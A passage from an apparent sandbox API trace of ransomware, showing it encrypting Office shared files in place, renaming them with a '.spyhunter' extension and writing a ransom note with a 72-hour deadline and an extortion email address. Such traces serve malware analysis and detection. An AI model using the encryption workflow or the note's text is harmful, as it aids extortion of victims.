dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x25cfde8*=0x30) returned 1 [0088.829] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPWMI.MOF" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppwmi.mof"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0088.829] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPWMI.MOF") returned 95 [0088.829] StrStrW (lpFirst="OSPPWMI.MOF", lpSrch=".txt") returned 0x0 [0088.829] GetProcessHeap () returned 0x2c0000 [0088.829] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x340fe8 [0088.830] ReadFile (in: hFile=0x16c, lpBuffer=0x340fe8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfdac, lpOverlapped=0x0 | out: lpBuffer=0x340fe8*, lpNumberOfBytesRead=0x25cfdac*=0x2800, lpOverlapped=0x0) returned 1 [0089.332] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.332] WriteFile (in: hFile=0x16c, lpBuffer=0x340fe8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cfdac, lpOverlapped=0x0 | out: lpBuffer=0x340fe8*, lpNumberOfBytesWritten=0x25cfdac*=0x2800, lpOverlapped=0x0) returned 1 [0089.332] GetProcessHeap () returned 0x2c0000 [0089.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x340fe8 | out: hHeap=0x2c0000) returned 1 [0089.333] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.334] WriteFile (in: hFile=0x16c, lpBuffer=0x25cfdec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfdac, lpOverlapped=0x0 | out: lpBuffer=0x25cfdec*, lpNumberOfBytesWritten=0x25cfdac*=0x4, lpOverlapped=0x0) returned 1 [0089.405] WriteFile (in: hFile=0x16c, lpBuffer=0x320308*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfdac, lpOverlapped=0x0 | out: lpBuffer=0x320308*, lpNumberOfBytesWritten=0x25cfdac*=0x30, lpOverlapped=0x0) returned 1 [0089.405] CloseHandle (hObject=0x16c) returned 1 [0089.406] GetProcessHeap () returned 0x2c0000 [0089.406] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x340fe8 [0089.406] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPWMI.MOF.spyhunter") returned 105 [0089.406] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPWMI.MOF" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppwmi.mof"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPWMI.MOF.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppwmi.mof.spyhunter")) returned 1 [0089.407] GetProcessHeap () returned 0x2c0000 [0089.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x340fe8 | out: hHeap=0x2c0000) returned 1 [0089.407] GetProcessHeap () returned 0x2c0000 [0089.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0089.407] GetProcessHeap () returned 0x2c0000 [0089.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37b110 | out: hHeap=0x2c0000) returned 1 [0089.407] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfde8 | out: pbBuffer=0x25cfde8) returned 1 [0089.407] GetProcessHeap () returned 0x2c0000 [0089.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0089.407] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x25cfde0*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x25cfde0*=0x30) returned 1 [0089.407] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FSTOCK.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\fstock.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0089.466] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FSTOCK.DLL") returned 71 [0089.466] StrStrW (lpFirst="FSTOCK.DLL", lpSrch=".txt") returned 0x0 [0089.466] GetProcessHeap () returned 0x2c0000 [0089.466] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x340fe8 [0089.466] ReadFile (in: hFile=0x15c, lpBuffer=0x340fe8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfda4, lpOverlapped=0x0 | out: lpBuffer=0x340fe8*, lpNumberOfBytesRead=0x25cfda4*=0x2800, lpOverlapped=0x0) returned 1 [0089.554] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.554] WriteFile (in: hFile=0x15c, lpBuffer=0x340fe8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cfda4, lpOverlapped=0x0 | out: lpBuffer=0x340fe8*, lpNumberOfBytesWritten=0x25cfda4*=0x2800, lpOverlapped=0x0) returned 1 [0089.554] GetProcessHeap () returned 0x2c0000 [0089.554] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x340fe8 | out: hHeap=0x2c0000) returned 1 [0089.556] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.556] WriteFile (in: hFile=0x15c, lpBuffer=0x25cfde4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfda4, lpOverlapped=0x0 | out: lpBuffer=0x25cfde4*, lpNumberOfBytesWritten=0x25cfda4*=0x4, lpOverlapped=0x0) returned 1 [0089.644] WriteFile (in: hFile=0x15c, lpBuffer=0x320308*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfda4, lpOverlapped=0x0 | out: lpBuffer=0x320308*, lpNumberOfBytesWritten=0x25cfda4*=0x30, lpOverlapped=0x0) returned 1 [0089.644] CloseHandle (hObject=0x15c) returned 1 [0089.652] GetProcessHeap () returned 0x2c0000 [0089.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x340fe8 [0089.652] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FSTOCK.DLL.spyhunter") returned 81 [0089.652] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FSTOCK.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\fstock.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FSTOCK.DLL.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\fstock.dll.spyhunter")) returned 1 [0089.695] GetProcessHeap () returned 0x2c0000 [0089.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x340fe8 | out: hHeap=0x2c0000) returned 1 [0089.695] GetProcessHeap () returned 0x2c0000 [0089.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0089.695] GetProcessHeap () returned 0x2c0000 [0089.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37d8b8 | out: hHeap=0x2c0000) returned 1 [0089.695] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfde8 | out: pbBuffer=0x25cfde8) returned 1 [0089.695] GetProcessHeap () returned 0x2c0000 [0089.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0089.695] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x25cfde0*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x25cfde0*=0x30) returned 1 [0089.695] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\MOFL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\mofl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0089.696] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\MOFL.DLL") returned 69 [0089.696] StrStrW (lpFirst="MOFL.DLL", lpSrch=".txt") returned 0x0 [0089.696] GetProcessHeap () returned 0x2c0000 [0089.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x37f868 [0089.697] ReadFile (in: hFile=0x15c, lpBuffer=0x37f868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfda4, lpOverlapped=0x0 | out: lpBuffer=0x37f868*, lpNumberOfBytesRead=0x25cfda4*=0x2800, lpOverlapped=0x0) returned 1 [0089.703] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.703] WriteFile (in: hFile=0x15c, lpBuffer=0x37f868*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cfda4, lpOverlapped=0x0 | out: lpBuffer=0x37f868*, lpNumberOfBytesWritten=0x25cfda4*=0x2800, lpOverlapped=0x0) returned 1 [0089.703] GetProcessHeap () returned 0x2c0000 [0089.703] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37f868 | out: hHeap=0x2c0000) returned 1 [0089.704] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.704] WriteFile (in: hFile=0x15c, lpBuffer=0x25cfde4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfda4, lpOverlapped=0x0 | out: lpBuffer=0x25cfde4*, lpNumberOfBytesWritten=0x25cfda4*=0x4, lpOverlapped=0x0) returned 1 [0089.733] WriteFile (in: hFile=0x15c, lpBuffer=0x320308*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfda4, lpOverlapped=0x0 | out: lpBuffer=0x320308*, lpNumberOfBytesWritten=0x25cfda4*=0x30, lpOverlapped=0x0) returned 1 [0089.733] CloseHandle (hObject=0x15c) returned 1 [0089.743] GetProcessHeap () returned 0x2c0000 [0089.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x340fe8 [0089.743] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\MOFL.DLL.spyhunter") returned 79 [0089.743] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\MOFL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\mofl.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\MOFL.DLL.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\mofl.dll.spyhunter")) returned 1 [0089.743] GetProcessHeap () returned 0x2c0000 [0089.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x340fe8 | out: hHeap=0x2c0000) returned 1 [0089.743] GetProcessHeap () returned 0x2c0000 [0089.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0089.744] GetProcessHeap () returned 0x2c0000 [0089.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37d708 | out: hHeap=0x2c0000) returned 1 [0089.744] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfde0 | out: pbBuffer=0x25cfde0) returned 1 [0089.744] GetProcessHeap () returned 0x2c0000 [0089.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0089.744] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x25cfdd8*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x25cfdd8*=0x30) returned 1 [0089.744] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\metconv.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0089.746] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.DLL") returned 72 [0089.746] StrStrW (lpFirst="METCONV.DLL", lpSrch=".txt") returned 0x0 [0089.747] GetProcessHeap () returned 0x2c0000 [0089.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x376930 [0089.747] ReadFile (in: hFile=0x15c, lpBuffer=0x376930, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfd9c, lpOverlapped=0x0 | out: lpBuffer=0x376930*, lpNumberOfBytesRead=0x25cfd9c*=0x2800, lpOverlapped=0x0) returned 1 [0089.820] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.820] WriteFile (in: hFile=0x15c, lpBuffer=0x376930*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cfd9c, lpOverlapped=0x0 | out: lpBuffer=0x376930*, lpNumberOfBytesWritten=0x25cfd9c*=0x2800, lpOverlapped=0x0) returned 1 [0089.820] GetProcessHeap () returned 0x2c0000 [0089.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x376930 | out: hHeap=0x2c0000) returned 1 [0089.821] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.821] WriteFile (in: hFile=0x15c, lpBuffer=0x25cfddc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfd9c, lpOverlapped=0x0 | out: lpBuffer=0x25cfddc*, lpNumberOfBytesWritten=0x25cfd9c*=0x4, lpOverlapped=0x0) returned 1 [0089.822] WriteFile (in: hFile=0x15c, lpBuffer=0x320308*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfd9c, lpOverlapped=0x0 | out: lpBuffer=0x320308*, lpNumberOfBytesWritten=0x25cfd9c*=0x30, lpOverlapped=0x0) returned 1 [0089.822] CloseHandle (hObject=0x15c) returned 1 [0089.824] GetProcessHeap () returned 0x2c0000 [0089.824] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0089.825] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.DLL.spyhunter") returned 82 [0089.825] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\metconv.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.DLL.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\metconv.dll.spyhunter")) returned 1 [0089.826] GetProcessHeap () returned 0x2c0000 [0089.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c10048 | out: hHeap=0x2c0000) returned 1 [0089.826] GetProcessHeap () returned 0x2c0000 [0089.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0089.826] GetProcessHeap () returned 0x2c0000 [0089.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3856e0 | out: hHeap=0x2c0000) returned 1 [0089.826] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfde0 | out: pbBuffer=0x25cfde0) returned 1 [0089.826] GetProcessHeap () returned 0x2c0000 [0089.826] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0089.826] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x25cfdd8*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x25cfdd8*=0x30) returned 1 [0089.826] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\WPFT632.CNV" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\wpft632.cnv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0089.887] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\WPFT632.CNV") returned 71 [0089.888] StrStrW (lpFirst="WPFT632.CNV", lpSrch=".txt") returned 0x0 [0089.888] GetProcessHeap () returned 0x2c0000 [0089.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x340fe8 [0089.888] ReadFile (in: hFile=0x178, lpBuffer=0x340fe8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfd9c, lpOverlapped=0x0 | out: lpBuffer=0x340fe8*, lpNumberOfBytesRead=0x25cfd9c*=0x2800, lpOverlapped=0x0) returned 1 [0089.900] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.900] WriteFile (in: hFile=0x178, lpBuffer=0x340fe8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cfd9c, lpOverlapped=0x0 | out: lpBuffer=0x340fe8*, lpNumberOfBytesWritten=0x25cfd9c*=0x2800, lpOverlapped=0x0) returned 1 [0089.901] GetProcessHeap () returned 0x2c0000 [0089.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x340fe8 | out: hHeap=0x2c0000) returned 1 [0089.901] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.901] WriteFile (in: hFile=0x178, lpBuffer=0x25cfddc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfd9c, lpOverlapped=0x0 | out: lpBuffer=0x25cfddc*, lpNumberOfBytesWritten=0x25cfd9c*=0x4, lpOverlapped=0x0) returned 1 [0089.927] WriteFile (in: hFile=0x178, lpBuffer=0x320308*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfd9c, lpOverlapped=0x0 | out: lpBuffer=0x320308*, lpNumberOfBytesWritten=0x25cfd9c*=0x30, lpOverlapped=0x0) returned 1 [0089.927] CloseHandle (hObject=0x178) returned 1 [0090.009] GetProcessHeap () returned 0x2c0000 [0090.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c20090 [0090.009] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\WPFT632.CNV.spyhunter") returned 81 [0090.009] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\WPFT632.CNV" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\wpft632.cnv"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\WPFT632.CNV.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\wpft632.cnv.spyhunter")) returned 1 [0090.009] GetProcessHeap () returned 0x2c0000 [0090.009] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c20090 | out: hHeap=0x2c0000) returned 1 [0090.009] GetProcessHeap () returned 0x2c0000 [0090.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0090.010] GetProcessHeap () returned 0x2c0000 [0090.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37e128 | out: hHeap=0x2c0000) returned 1 [0090.010] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfdd8 | out: pbBuffer=0x25cfdd8) returned 1 [0090.010] GetProcessHeap () returned 0x2c0000 [0090.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0090.010] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x25cfdd0*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x25cfdd0*=0x30) returned 1 [0090.010] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\AXIS.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\axis.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0090.030] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\AXIS.INF") returned 73 [0090.030] StrStrW (lpFirst="AXIS.INF", lpSrch=".txt") returned 0x0 [0090.030] GetProcessHeap () returned 0x2c0000 [0090.030] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x340fe8 [0090.030] ReadFile (in: hFile=0x178, lpBuffer=0x340fe8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfd94, lpOverlapped=0x0 | out: lpBuffer=0x340fe8*, lpNumberOfBytesRead=0x25cfd94*=0x211, lpOverlapped=0x0) returned 1 [0090.031] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffdef, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.031] WriteFile (in: hFile=0x178, lpBuffer=0x340fe8*, nNumberOfBytesToWrite=0x211, lpNumberOfBytesWritten=0x25cfd94, lpOverlapped=0x0 | out: lpBuffer=0x340fe8*, lpNumberOfBytesWritten=0x25cfd94*=0x211, lpOverlapped=0x0) returned 1 [0090.031] GetProcessHeap () returned 0x2c0000 [0090.031] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x340fe8 | out: hHeap=0x2c0000) returned 1 [0090.031] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.031] WriteFile (in: hFile=0x178, lpBuffer=0x25cfdd4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfd94, lpOverlapped=0x0 | out: lpBuffer=0x25cfdd4*, lpNumberOfBytesWritten=0x25cfd94*=0x4, lpOverlapped=0x0) returned 1 [0090.032] WriteFile (in: hFile=0x178, lpBuffer=0x320308*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfd94, lpOverlapped=0x0 | out: lpBuffer=0x320308*, lpNumberOfBytesWritten=0x25cfd94*=0x30, lpOverlapped=0x0) returned 1 [0090.032] CloseHandle (hObject=0x178) returned 1 [0090.032] GetProcessHeap () returned 0x2c0000 [0090.033] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c20090 [0090.033] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\AXIS.INF.spyhunter") returned 83 [0090.033] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\AXIS.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\axis.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\AXIS.INF.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\axis.inf.spyhunter")) returned 1 [0090.133] GetProcessHeap () returned 0x2c0000 [0090.133] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c20090 | out: hHeap=0x2c0000) returned 1 [0090.133] GetProcessHeap () returned 0x2c0000 [0090.133] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0090.133] GetProcessHeap () returned 0x2c0000 [0090.133] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3857c0 | out: hHeap=0x2c0000) returned 1 [0090.133] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0090.134] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0090.134] WriteFile (in: hFile=0x178, lpBuffer=0x25cfd0b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cfe34, lpOverlapped=0x0 | out: lpBuffer=0x25cfd0b*, lpNumberOfBytesWritten=0x25cfe34*=0x127, lpOverlapped=0x0) returned 1 [0090.135] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0090.135] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, 